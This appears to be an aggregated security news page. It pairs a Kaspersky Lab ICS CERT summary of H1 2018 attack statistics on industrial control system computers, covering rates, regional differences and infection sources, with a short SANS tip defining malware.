For the purposes of this report, attacked computers are those on which our security solutions have been triggered at least once during the reporting period. When determining percentages of machines attacked, we use the ratio of unique computers attacked to all computers in our sample from which we received anonymized information during the reporting period.

ICS servers and stationary workstations of engineers and operators often do not have full-time direct internet access due to restrictions specific to industrial networks. Internet access may be provided to such computers, for example, during maintenance periods.

Workstations of system/network administrators, engineers, developers and integrators of industrial automation systems may have frequent or even full-time internet connections.

As a result, in our sample of computers categorized by Kaspersky Lab ICS CERT as part of the industrial infrastructure of organizations, about 42% of all machines had regular or full-time internet connections in H1 2018. The remaining machines connected to the internet no more than once a month, many much less frequently than that.

Main figures

The percentage of ICS computers attacked in H1 2018 increased by 3.5 p.p. compared with H2 2017 and reached 41.2%. The year-over-year increase was 4.6 p.p.

Percentage of ICS computers attacked, H1 2017 – H1 2018

A comparison between different regions of the world shows that:

  • countries in Africa, Asia and Latin America are significantly worse off in terms of the percentage of ICS computers attacked than countries in Europe, North America and Australia;
  • the figures for Eastern Europe are considerably greater than those for Western Europe;
  • the percentage of ICS computers attacked in Southern Europe is higher than that in Northern and Western Europe.

This is presumably due to differences in the amounts organizations invest in infrastructure protection solutions.

Percentage of ICS systems attacked in regions of the world, H1 2018 vs H2 2017

The main sources of infection for computers in organizations’ industrial network infrastructure are the internet, removable media and email. Contrary to the conventional wisdom about control networks being isolated, in recent years the internet has become the main source of infection for computers on organizations’ industrial networks.

Main sources of threats blocked on ICS computers (percentage of computers attacked during half-year periods), H1 2017 – H1 2018

While a year ago, in H1 2017, the internet was the source of threats blocked on 20.6% of ICS computers, in H1 2018 the figure was as high as 27.3%.

Main sources of threats blocked on ICS computers by region, H1 2018

More information about events during H1 2018, detailed statistics and our recommendations can be found in the full version of the report (PDF).

Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT) is a global project launched by Kaspersky Lab in 2016 to coordinate the efforts of automation system vendors, industrial facility owners and operators, and IT security researchers to protect industrial enterprises from cyberattacks. Kaspersky Lab ICS CERT devotes its efforts primarily to identifying potential and existing threats that target industrial automation systems and the Industrial Internet of Things.

What is Malware

SANS Tip of the Day - Wed, 09/05/2018 - 01:00

Malware is software--a computer program--used to perform malicious actions. In fact, the term malware is a combination of the words malicious and software. Cyber criminals install malware on your computers or devices to gain control over them or gain access to what they contain. Once installed, these attackers can use malware to spy on your online activities, steal your passwords and files, or use your system to attack others.